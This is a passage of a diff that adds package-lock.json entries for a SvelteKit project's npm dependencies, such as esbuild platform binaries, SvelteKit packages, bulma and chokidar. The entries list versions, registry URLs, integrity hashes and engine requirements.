+ "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.18.20.tgz",
+ "integrity": "sha512-+8231GMs3mAEth6Ja1iK0a1sQ3ohfcpzpRLH8uuc5/KVDFneH6jtAJLFGafpzpMRO6DzJ6AvXKze9LfFMrIHVQ==",
+ "cpu": [
+ "s390x"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-x64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.18.20.tgz",
+ "integrity": "sha512-UYqiqemphJcNsFEskc73jQ7B9jgwjWrSayxawS6UVFZGWrAAtkzjxSqnoclCXxWtfwLdzU+vTpcNYhpn43uP1w==",
+ "cpu": [
+ "x64"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/netbsd-x64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.18.20.tgz",
+ "integrity": "sha512-iO1c++VP6xUBUmltHZoMtCUdPlnPGdBom6IrO4gyKPFFVBKioIImVooR5I83nTew5UOYrk3gIJhbZh8X44y06A==",
+ "cpu": [
+ "x64"
+ ],
+ "optional": true,
+ "os": [
+ "netbsd"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/openbsd-x64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.18.20.tgz",
+ "integrity": "sha512-e5e4YSsuQfX4cxcygw/UCPIEP6wbIL+se3sxPdCiMbFLBWu0eiZOJ7WoD+ptCLrmjZBK1Wk7I6D/I3NglUGOxg==",
+ "cpu": [
+ "x64"
+ ],
+ "optional": true,
+ "os": [
+ "openbsd"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/sunos-x64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.18.20.tgz",
+ "integrity": "sha512-kDbFRFp0YpTQVVrqUd5FTYmWo45zGaXe0X8E1G/LKFC0v8x0vWrhOWSLITcCn63lmZIxfOMXtCfti/RxN/0wnQ==",
+ "cpu": [
+ "x64"
+ ],
+ "optional": true,
+ "os": [
+ "sunos"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/win32-arm64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.18.20.tgz",
+ "integrity": "sha512-ddYFR6ItYgoaq4v4JmQQaAI5s7npztfV4Ag6NrhiaW0RrnOXqBkgwZLofVTlq1daVTQNhtI5oieTvkRPfZrePg==",
+ "cpu": [
+ "arm64"
+ ],
+ "optional": true,
+ "os": [
+ "win32"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/win32-ia32": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.18.20.tgz",
+ "integrity": "sha512-Wv7QBi3ID/rROT08SABTS7eV4hX26sVduqDOTe1MvGMjNd3EjOz4b7zeexIR62GTIEKrfJXKL9LFxTYgkyeu7g==",
+ "cpu": [
+ "ia32"
+ ],
+ "optional": true,
+ "os": [
+ "win32"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/win32-x64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.18.20.tgz",
+ "integrity": "sha512-kTdfRcSiDfQca/y9QIkng02avJ+NCaQvrMejlsB3RRv5sE9rRoeBPISaZpKxHELzRxZyLvNts1P27W3wV+8geQ==",
+ "cpu": [
+ "x64"
+ ],
+ "optional": true,
+ "os": [
+ "win32"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@fastify/busboy": {
+ "version": "2.1.0",
+ "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz",
+ "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==",
+ "engines": {
+ "node": ">=14"
+ }
+ },
+ "node_modules/@fontsource/fira-mono": {
+ "version": "4.5.10",
+ "resolved": "https://registry.npmjs.org/@fontsource/fira-mono/-/fira-mono-4.5.10.tgz",
+ "integrity": "sha512-bxUnRP8xptGRo8YXeY073DSpfK74XpSb0ZyRNpHV9WvLnJ7TwPOjZll8hTMin7zLC6iOp59pDZ8EQDj1gzgAQQ==",
+ "dev": true
+ },
+ "node_modules/@jridgewell/gen-mapping": {
+ "version": "0.3.3",
+ "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz",
+ "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==",
+ "dependencies": {
+ "@jridgewell/set-array": "^1.0.1",
+ "@jridgewell/sourcemap-codec": "^1.4.10",
+ "@jridgewell/trace-mapping": "^0.3.9"
+ },
+ "engines": {
+ "node": ">=6.0.0"
+ }
+ },
+ "node_modules/@jridgewell/resolve-uri": {
+ "version": "3.1.1",
+ "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.1.tgz",
+ "integrity": "sha512-dSYZh7HhCDtCKm4QakX0xFpsRDqjjtZf/kjI/v3T3Nwt5r8/qz/M19F9ySyOqU94SXBmeG9ttTul+YnR4LOxFA==",
+ "engines": {
+ "node": ">=6.0.0"
+ }
+ },
+ "node_modules/@jridgewell/set-array": {
+ "version": "1.1.2",
+ "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz",
+ "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==",
+ "engines": {
+ "node": ">=6.0.0"
+ }
+ },
+ "node_modules/@jridgewell/sourcemap-codec": {
+ "version": "1.4.15",
+ "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz",
+ "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg=="
+ },
+ "node_modules/@jridgewell/trace-mapping": {
+ "version": "0.3.20",
+ "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.20.tgz",
+ "integrity": "sha512-R8LcPeWZol2zR8mmH3JeKQ6QRCFb7XgUhV9ZlGhHLGyg4wpPiPZNQOOWhFZhxKw8u//yTbNGI42Bx/3paXEQ+Q==",
+ "dependencies": {
+ "@jridgewell/resolve-uri": "^3.1.0",
+ "@jridgewell/sourcemap-codec": "^1.4.14"
+ }
+ },
+ "node_modules/@neoconfetti/svelte": {
+ "version": "1.0.0",
+ "resolved": "https://registry.npmjs.org/@neoconfetti/svelte/-/svelte-1.0.0.tgz",
+ "integrity": "sha512-SmksyaJAdSlMa9cTidVSIqYo1qti+WTsviNDwgjNVm+KQ3DRP2Df9umDIzC4vCcpEYY+chQe0i2IKnLw03AT8Q==",
+ "dev": true
+ },
+ "node_modules/@nodelib/fs.scandir": {
+ "version": "2.1.5",
+ "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz",
+ "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==",
+ "dev": true,
+ "dependencies": {
+ "@nodelib/fs.stat": "2.0.5",
+ "run-parallel": "^1.1.9"
+ },
+ "engines": {
+ "node": ">= 8"
+ }
+ },
+ "node_modules/@nodelib/fs.stat": {
+ "version": "2.0.5",
+ "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz",
+ "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==",
+ "dev": true,
+ "engines": {
+ "node": ">= 8"
+ }
+ },
+ "node_modules/@nodelib/fs.walk": {
+ "version": "1.2.8",
+ "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz",
+ "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==",
+ "dev": true,
+ "dependencies": {
+ "@nodelib/fs.scandir": "2.1.5",
+ "fastq": "^1.6.0"
+ },
+ "engines": {
+ "node": ">= 8"
+ }
+ },
+ "node_modules/@polka/url": {
+ "version": "1.0.0-next.23",
+ "resolved": "https://registry.npmjs.org/@polka/url/-/url-1.0.0-next.23.tgz",
+ "integrity": "sha512-C16M+IYz0rgRhWZdCmK+h58JMv8vijAA61gmz2rspCSwKwzBebpdcsiUmwrtJRdphuY30i6BSLEOP8ppbNLyLg=="
+ },
+ "node_modules/@sveltejs/adapter-auto": {
+ "version": "2.1.1",
+ "resolved": "https://registry.npmjs.org/@sveltejs/adapter-auto/-/adapter-auto-2.1.1.tgz",
+ "integrity": "sha512-nzi6x/7/3Axh5VKQ8Eed3pYxastxoa06Y/bFhWb7h3Nu+nGRVxKAy3+hBJgmPCwWScy8n0TsstZjSVKfyrIHkg==",
+ "dev": true,
+ "dependencies": {
+ "import-meta-resolve": "^4.0.0"
+ },
+ "peerDependencies": {
+ "@sveltejs/kit": "^1.0.0"
+ }
+ },
+ "node_modules/@sveltejs/adapter-static": {
+ "version": "2.0.3",
+ "resolved": "https://registry.npmjs.org/@sveltejs/adapter-static/-/adapter-static-2.0.3.tgz",
+ "integrity": "sha512-VUqTfXsxYGugCpMqQv1U0LIdbR3S5nBkMMDmpjGVJyM6Q2jHVMFtdWJCkeHMySc6mZxJ+0eZK3T7IgmUCDrcUQ==",
+ "peerDependencies": {
+ "@sveltejs/kit": "^1.5.0"
+ }
+ },
+ "node_modules/@sveltejs/kit": {
+ "version": "1.27.6",
+ "resolved": "https://registry.npmjs.org/@sveltejs/kit/-/kit-1.27.6.tgz",
+ "integrity": "sha512-GsjTkMbKzXdbeRg0tk8S7HNShQ4879ftRr0ZHaZfjbig1xQwG57Bvcm9U9/mpLJtCapLbLWUnygKrgcLISLC8A==",
+ "hasInstallScript": true,
+ "dependencies": {
+ "@sveltejs/vite-plugin-svelte": "^2.5.0",
+ "@types/cookie": "^0.5.1",
+ "cookie": "^0.5.0",
+ "devalue": "^4.3.1",
+ "esm-env": "^1.0.0",
+ "kleur": "^4.1.5",
+ "magic-string": "^0.30.0",
+ "mrmime": "^1.0.1",
+ "sade": "^1.8.1",
+ "set-cookie-parser": "^2.6.0",
+ "sirv": "^2.0.2",
+ "tiny-glob": "^0.2.9",
+ "undici": "~5.26.2"
+ },
+ "bin": {
+ "svelte-kit": "svelte-kit.js"
+ },
+ "engines": {
+ "node": "^16.14 || >=18"
+ },
+ "peerDependencies": {
+ "svelte": "^3.54.0 || ^4.0.0-next.0 || ^5.0.0-next.0",
+ "vite": "^4.0.0"
+ }
+ },
+ "node_modules/@sveltejs/vite-plugin-svelte": {
+ "version": "2.5.2",
+ "resolved": "https://registry.npmjs.org/@sveltejs/vite-plugin-svelte/-/vite-plugin-svelte-2.5.2.tgz",
+ "integrity": "sha512-Dfy0Rbl+IctOVfJvWGxrX/3m6vxPLH8o0x+8FA5QEyMUQMo4kGOVIojjryU7YomBAexOTAuYf1RT7809yDziaA==",
+ "dependencies": {
+ "@sveltejs/vite-plugin-svelte-inspector": "^1.0.4",
+ "debug": "^4.3.4",
+ "deepmerge": "^4.3.1",
+ "kleur": "^4.1.5",
+ "magic-string": "^0.30.3",
+ "svelte-hmr": "^0.15.3",
+ "vitefu": "^0.2.4"
+ },
+ "engines": {
+ "node": "^14.18.0 || >= 16"
+ },
+ "peerDependencies": {
+ "svelte": "^3.54.0 || ^4.0.0 || ^5.0.0-next.0",
+ "vite": "^4.0.0"
+ }
+ },
+ "node_modules/@sveltejs/vite-plugin-svelte-inspector": {
+ "version": "1.0.4",
+ "resolved": "https://registry.npmjs.org/@sveltejs/vite-plugin-svelte-inspector/-/vite-plugin-svelte-inspector-1.0.4.tgz",
+ "integrity": "sha512-zjiuZ3yydBtwpF3bj0kQNV0YXe+iKE545QGZVTaylW3eAzFr+pJ/cwK8lZEaRp4JtaJXhD5DyWAV4AxLh6DgaQ==",
+ "dependencies": {
+ "debug": "^4.3.4"
+ },
+ "engines": {
+ "node": "^14.18.0 || >= 16"
+ },
+ "peerDependencies": {
+ "@sveltejs/vite-plugin-svelte": "^2.2.0",
+ "svelte": "^3.54.0 || ^4.0.0",
+ "vite": "^4.0.0"
+ }
+ },
+ "node_modules/@types/cookie": {
+ "version": "0.5.4",
+ "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.5.4.tgz",
+ "integrity": "sha512-7z/eR6O859gyWIAjuvBWFzNURmf2oPBmJlfVWkwehU5nzIyjwBsTh7WMmEEV4JFnHuQ3ex4oyTvfKzcyJVDBNA=="
+ },
+ "node_modules/@types/estree": {
+ "version": "1.0.5",
+ "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.5.tgz",
+ "integrity": "sha512-/kYRxGDLWzHOB7q+wtSUQlFrtcdUccpfy+X+9iMBpHK8QLLhx2wIPYuS5DYtR9Wa/YlZAbIovy7qVdB1Aq6Lyw=="
+ },
+ "node_modules/@types/pug": {
+ "version": "2.0.10",
+ "resolved": "https://registry.npmjs.org/@types/pug/-/pug-2.0.10.tgz",
+ "integrity": "sha512-Sk/uYFOBAB7mb74XcpizmH0KOR2Pv3D2Hmrh1Dmy5BmK3MpdSa5kqZcg6EKBdklU0bFXX9gCfzvpnyUehrPIuA==",
+ "dev": true
+ },
+ "node_modules/acorn": {
+ "version": "8.11.2",
+ "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.11.2.tgz",
+ "integrity": "sha512-nc0Axzp/0FILLEVsm4fNwLCwMttvhEI263QtVPQcbpfZZ3ts0hLsZGOpE6czNlid7CJ9MlyH8reXkpsf3YUY4w==",
+ "bin": {
+ "acorn": "bin/acorn"
+ },
+ "engines": {
+ "node": ">=0.4.0"
+ }
+ },
+ "node_modules/anymatch": {
+ "version": "3.1.3",
+ "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz",
+ "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==",
+ "dev": true,
+ "dependencies": {
+ "normalize-path": "^3.0.0",
+ "picomatch": "^2.0.4"
+ },
+ "engines": {
+ "node": ">= 8"
+ }
+ },
+ "node_modules/aria-query": {
+ "version": "5.3.0",
+ "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.3.0.tgz",
+ "integrity": "sha512-b0P0sZPKtyu8HkeRAfCq0IfURZK+SuwMjY1UXGBU27wpAiTwQAIlq56IbIO+ytk/JjS1fMR14ee5WBBfKi5J6A==",
+ "dependencies": {
+ "dequal": "^2.0.3"
+ }
+ },
+ "node_modules/autoprefixer": {
+ "version": "10.4.16",
+ "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.4.16.tgz",
+ "integrity": "sha512-7vd3UC6xKp0HLfua5IjZlcXvGAGy7cBAXTg2lyQ/8WpNhd6SiZ8Be+xm3FyBSYJx5GKcpRCzBh7RH4/0dnY+uQ==",
+ "dev": true,
+ "funding": [
+ {
+ "type": "opencollective",
+ "url": "https://opencollective.com/postcss/"
+ },
+ {
+ "type": "tidelift",
+ "url": "https://tidelift.com/funding/github/npm/autoprefixer"
+ },
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/ai"
+ }
+ ],
+ "dependencies": {
+ "browserslist": "^4.21.10",
+ "caniuse-lite": "^1.0.30001538",
+ "fraction.js": "^4.3.6",
+ "normalize-range": "^0.1.2",
+ "picocolors": "^1.0.0",
+ "postcss-value-parser": "^4.2.0"
+ },
+ "bin": {
+ "autoprefixer": "bin/autoprefixer"
+ },
+ "engines": {
+ "node": "^10 || ^12 || >=14"
+ },
+ "peerDependencies": {
+ "postcss": "^8.1.0"
+ }
+ },
+ "node_modules/axobject-query": {
+ "version": "3.2.1",
+ "resolved": "https://registry.npmjs.org/axobject-query/-/axobject-query-3.2.1.tgz",
+ "integrity": "sha512-jsyHu61e6N4Vbz/v18DHwWYKK0bSWLqn47eeDSKPB7m8tqMHF9YJ+mhIk2lVteyZrY8tnSj/jHOv4YiTCuCJgg==",
+ "dependencies": {
+ "dequal": "^2.0.3"
+ }
+ },
+ "node_modules/balanced-match": {
+ "version": "1.0.2",
+ "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz",
+ "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==",
+ "dev": true
+ },
+ "node_modules/binary-extensions": {
+ "version": "2.2.0",
+ "resolved": "https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.2.0.tgz",
+ "integrity": "sha512-jDctJ/IVQbZoJykoeHbhXpOlNBqGNcwXJKJog42E5HDPUwQTSdjCHdihjj0DlnheQ7blbT6dHOafNAiS8ooQKA==",
+ "dev": true,
+ "engines": {
+ "node": ">=8"
+ }
+ },
+ "node_modules/brace-expansion": {
+ "version": "1.1.11",
+ "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz",
+ "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==",
+ "dev": true,
+ "dependencies": {
+ "balanced-match": "^1.0.0",
+ "concat-map": "0.0.1"
+ }
+ },
+ "node_modules/braces": {
+ "version": "3.0.2",
+ "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz",
+ "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==",
+ "dev": true,
+ "dependencies": {
+ "fill-range": "^7.0.1"
+ },
+ "engines": {
+ "node": ">=8"
+ }
+ },
+ "node_modules/browserslist": {
+ "version": "4.22.1",
+ "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.22.1.tgz",
+ "integrity": "sha512-FEVc202+2iuClEhZhrWy6ZiAcRLvNMyYcxZ8raemul1DYVOVdFsbqckWLdsixQZCpJlwe77Z3UTalE7jsjnKfQ==",
+ "dev": true,
+ "funding": [
+ {
+ "type": "opencollective",
+ "url": "https://opencollective.com/browserslist"
+ },
+ {
+ "type": "tidelift",
+ "url": "https://tidelift.com/funding/github/npm/browserslist"
+ },
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/ai"
+ }
+ ],
+ "dependencies": {
+ "caniuse-lite": "^1.0.30001541",
+ "electron-to-chromium": "^1.4.535",
+ "node-releases": "^2.0.13",
+ "update-browserslist-db": "^1.0.13"
+ },
+ "bin": {
+ "browserslist": "cli.js"
+ },
+ "engines": {
+ "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7"
+ }
+ },
+ "node_modules/buffer-crc32": {
+ "version": "0.2.13",
+ "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz",
+ "integrity": "sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==",
+ "dev": true,
+ "engines": {
+ "node": "*"
+ }
+ },
+ "node_modules/bulma": {
+ "version": "0.9.4",
+ "resolved": "https://registry.npmjs.org/bulma/-/bulma-0.9.4.tgz",
+ "integrity": "sha512-86FlT5+1GrsgKbPLRRY7cGDg8fsJiP/jzTqXXVqiUZZ2aZT8uemEOHlU1CDU+TxklPEZ11HZNNWclRBBecP4CQ=="
+ },
+ "node_modules/callsites": {
+ "version": "3.1.0",
+ "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz",
+ "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==",
+ "dev": true,
+ "engines": {
+ "node": ">=6"
+ }
+ },
+ "node_modules/caniuse-lite": {
+ "version": "1.0.30001563",
+ "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001563.tgz",
+ "integrity": "sha512-na2WUmOxnwIZtwnFI2CZ/3er0wdNzU7hN+cPYz/z2ajHThnkWjNBOpEPP4n+4r2WPM847JaMotaJE3bnfzjyKw==",
+ "dev": true,
+ "funding": [
+ {
+ "type": "opencollective",
+ "url": "https://opencollective.com/browserslist"
+ },
+ {
+ "type": "tidelift",
+ "url": "https://tidelift.com/funding/github/npm/caniuse-lite"
+ },
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/ai"
+ }
+ ]
+ },
+ "node_modules/chokidar": {
+ "version": "3.5.3",
+ "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-3.5.3.tgz",
+ "integrity": "sha512-Dr3sfKRP6oTcjf2JmUmFJfeVMvXBdegxB0iVQ5eb2V10uFJUCAS8OByZdVAyVb8xXNz3GjjTgj9kLWsZTqE6kw==",
+ "dev": true,
+ "funding": [
+ {
+ "type": "individual",
+ "url": "https://paulmillr.com/funding/"
+ }
+ ],
+ "dependencies": {
+ "anymatch": "~3.1.2",
+ "braces": "~3.0.2",
+ "glob-parent": "~5.1.2",
+ "is-binary-path": "~2.1.0",
+ "is-glob": "~4.0.1",
+ "normalize-path": "~3.0.0",
+ "readdirp": "~3.6.0"
+ },
+ "engines": {
+ "node": ">= 8.10.0"
+ },
+ "optionalDependencies": {
+ "fsevents": "~2.3.2"
+ }
+ },
+ "node_modules/code-red": {
+ "version": "1.0.4",
+ "resolved": "https://registry.npmjs.org/code-red/-/code-red-1.0.4.tgz",
+ "integrity": "sha512-7qJWqItLA8/VPVlKJlFXU+NBlo/qyfs39aJcuMT/2ere32ZqvF5OSxgdM5xOfJJ7O429gg2HM47y8v9P+9wrNw==",
+ "dependencies": {
+ "@jridgewell/sourcemap-codec": "^1.4.15",
+ "@types/estree": "^1.0.1",
+ "acorn": "^8.10.0",
+ "estree-walker": "^3.0.3",
+ "periscopic": "^3.1.0"
+ }
+ },
+ "node_modules/concat-map": {
+ "version": "0.0.1",
+ "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz",
+ "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==",
+ "dev": true
+ },
+ "node_modules/cookie": {
+ "version": "0.5.0",
+ "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.5.0.tgz",
+ "integrity": "sha512-YZ3GUyn/o8gfKJlnlX7g7xq4gyO6OSuhGPKaaGssGB2qgDUS0gPgtTvoyZLTt9Ab6dC4hfc9dV5arkvc/OCmrw==",
+ "engines": {
+ "node": ">= 0.6"
+ }
+ },
+ "node_modules/css-tree": {
+ "version": "2.3.1",
+ "resolved": "https://registry.npmjs.org/css-tree/-/css-tree-2.3.1.tgz",
+ "integrity": "sha512-6Fv1DV/TYw//QF5IzQdqsNDjx/wc8TrMBZsqjL9eW01tWb7R7k/mq+/VXfJCl7SoD5emsJop9cOByJZfs8hYIw==",
+ "dependencies": {
+ "mdn-data": "2.0.30",
+ "source-map-js": "^1.0.1"
+ },
+ "engines": {
+ "node": "^10 || ^12.20.0 || ^14.13.0 || >=15.0.0"
+ }
+ },
+ "node_modules/debug": {
+ "version": "4.3.4",
+ "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz",
+ "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==",
+ "dependencies": {
+ "ms": "2.1.2"
+ },
+ "engines": {
+ "node": ">=6.0"
+ },
+ "peerDependenciesMeta": {
+ "supports-color": {
+ "optional": true
+ }
+ }
+ },
+ "node_modules/deepmerge": {
+ "version": "4.3.1",
+ "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz",
+ "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==",
+ "engines": {
+ "node": ">=0.10.0"
+ }
+ },
+ "node_modules/dequal": {
+ "version": "2.0.3",
+ "resolved": "https://registry.npmjs.org/dequal/-/dequal-2.0.3.tgz",
+ "integrity": "sha512-0je+qPKHEMohvfRTCEo3CrPG6cAzAYgmzKyxRiYSSDkS6eGJdyVJm7WaYA5ECaAD9wLB2T4EEeymA5aFVcYXCA==",
+ "engines": {
+ "node": ">=6"
+ }
+ },
+ "node_modules/detect-indent": {
+ "version": "6.1.0",
+ "resolved": "https://registry.npmjs.org/detect-indent/-/detect-indent-6.1.0.tgz",
+ "integrity": "sha512-reYkTUJAZb9gUuZ2RvVCNhVHdg62RHnJ7WJl8ftMi4diZ6NWlciOzQN88pUhSELEwflJht4oQDv0F0BMlwaYtA==",
+ "dev": true,
+ "engines": {
+ "node": ">=8"
+ }
+ },
+ "node_modules/devalue": {
+ "version": "4.3.2",
+ "resolved": "https://registry.npmjs.org/devalue/-/devalue-4.3.2.tgz",
+ "integrity": "sha512-KqFl6pOgOW+Y6wJgu80rHpo2/3H07vr8ntR9rkkFIRETewbf5GaYYcakYfiKz89K+sLsuPkQIZaXDMjUObZwWg=="
+ },
+ "node_modules/electron-to-chromium": {
+ "version": "1.4.590",
+ "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.590.tgz",
+ "integrity": "sha512-hohItzsQcG7/FBsviCYMtQwUSWvVF7NVqPOnJCErWsAshsP/CR2LAXdmq276RbESNdhxiAq5/vRo1g2pxGXVww==",
+ "dev": true
+ },
+ "node_modules/es6-promise": {
+ "version": "3.3.1",
+ "resolved": "https://registry.npmjs.org/es6-promise/-/es6-promise-3.3.1.tgz",
+ "integrity": "sha512-SOp9Phqvqn7jtEUxPWdWfWoLmyt2VaJ6MpvP9Comy1MceMXqE6bxvaTu4iaxpYYPzhny28Lc+M87/c2cPK6lDg==",
+ "dev": true
+ },
+ "node_modules/esbuild": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.18.20.tgz",
+ "integrity": "sha512-ceqxoedUrcayh7Y7ZX6NdbbDzGROiyVBgC4PriJThBKSVPWnnFHZAkfI1lJT8QFkOwH4qOS2SJkS4wvpGl8BpA==",
+ "hasInstallScript": true,
+ "bin": {
+ "esbuild": "bin/esbuild"
+ },
+ "engines": {
+ "node": ">=12"
+ },
+ "optionalDependencies": {
+ "@esbuild/android-arm": "0.18.20",
+ "@esbuild/android-arm64": "0.18.20",
+ "@esbuild/android-x64": "0.18.20",
+ "@esbuild/darwin-arm64": "0.18.20",
+ "@esbuild/darwin-x64": "0.18.20",
+ "@esbuild/freebsd-arm64": "0.18.20",
+ "@esbuild/freebsd-x64": "0.18.20",
+ "@esbuild/linux-arm": "0.18.20",
+ "@esbuild/linux-arm64": "0.18.20",
+ "@esbuild/linux-ia32": "0.18.20",
+ "@esbuild/linux-loong64": "0.18.20",
+ "@esbuild/linux-mips64el": "0.18.20",
+ "@esbuild/linux-ppc64": "0.18.20",
+ "@esbuild/linux-riscv64": "0.18.20",
+ "@esbuild/linux-s390x": "0.18.20",
+ "@esbuild/linux-x64": "0.18.20",
+ "@esbuild/netbsd-x64": "0.18.20",
+ "@esbuild/openbsd-x64": "0.18.20",
+ "@esbuild/sunos-x64": "0.18.20",
+ "@esbuild/win32-arm64": "0.18.20",
+ "@esbuild/win32-ia32": "0.18.20",
+ "@esbuild/win32-x64": "0.18.20"
+ }
+ },
+ "node_modules/escalade": {
+ "version": "3.1.1",
+ "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz",
+ "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==",
+ "dev": true,
+ "engines": {
+ "node": ">=6"
+ }
+ },
+ "node_modules/esm-env": {
+ "version": "1.0.0",
+ "resolved": "https://registry.npmjs.org/esm-env/-/esm-env-1.0.0.tgz",
+ "integrity": "sha512-Cf6VksWPsTuW01vU9Mk/3vRue91Zevka5SjyNf3nEpokFRuqt/KjUQoGAwq9qMmhpLTHmXzSIrFRw8zxWzmFBA=="
+ },
+ "node_modules/estree-walker": {
+ "version": "3.0.3",
+ "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-3.0.3.tgz",
